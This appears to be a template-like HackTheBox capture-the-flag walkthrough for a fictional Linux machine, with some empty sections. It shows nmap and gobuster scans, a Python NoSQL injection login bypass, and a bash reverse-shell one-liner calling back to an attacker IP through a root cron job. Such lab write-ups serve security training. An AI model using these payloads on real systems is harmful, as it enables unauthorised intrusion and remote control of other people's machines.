Sample HackTheBox Machine Walkthrough
- Name: Sample Machine
- IP: 10.10.10.10
- OS: Linux
- Difficulty: Medium
Initial Enumeration
Started with a full port scan:
1
|
nmap -sV -sC -p- 10.10.10.10
|
Open Ports
- 22/tcp: SSH
- 80/tcp: HTTP
- 443/tcp: HTTPS
- 3306/tcp: MySQL
Web Enumeration
Found a web application running on port 80:
1
|
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
|
Discovered Endpoints
Exploitation
Found a vulnerable API endpoint:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
import requests
import json
url = "http://10.10.10.10/api/v1/users"
headers = {
"Content-Type": "application/json"
}
data = {
"username": "admin",
"password": {"$gt": ""}
}
response = requests.post(url, headers=headers, data=json.dumps(data))
print(response.text)
|
Privilege Escalation
After gaining initial access, found a cron job running as root:
Exploiting the Cron Job
1
2
|
echo 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1' > /tmp/exploit.sh
chmod +x /tmp/exploit.sh
|
Root Access
Successfully gained root access and found the root flag:
Lessons Learned
- Always check for NoSQL injection vulnerabilities
- Monitor cron jobs for privilege escalation opportunities
- Don’t forget to check for misconfigured services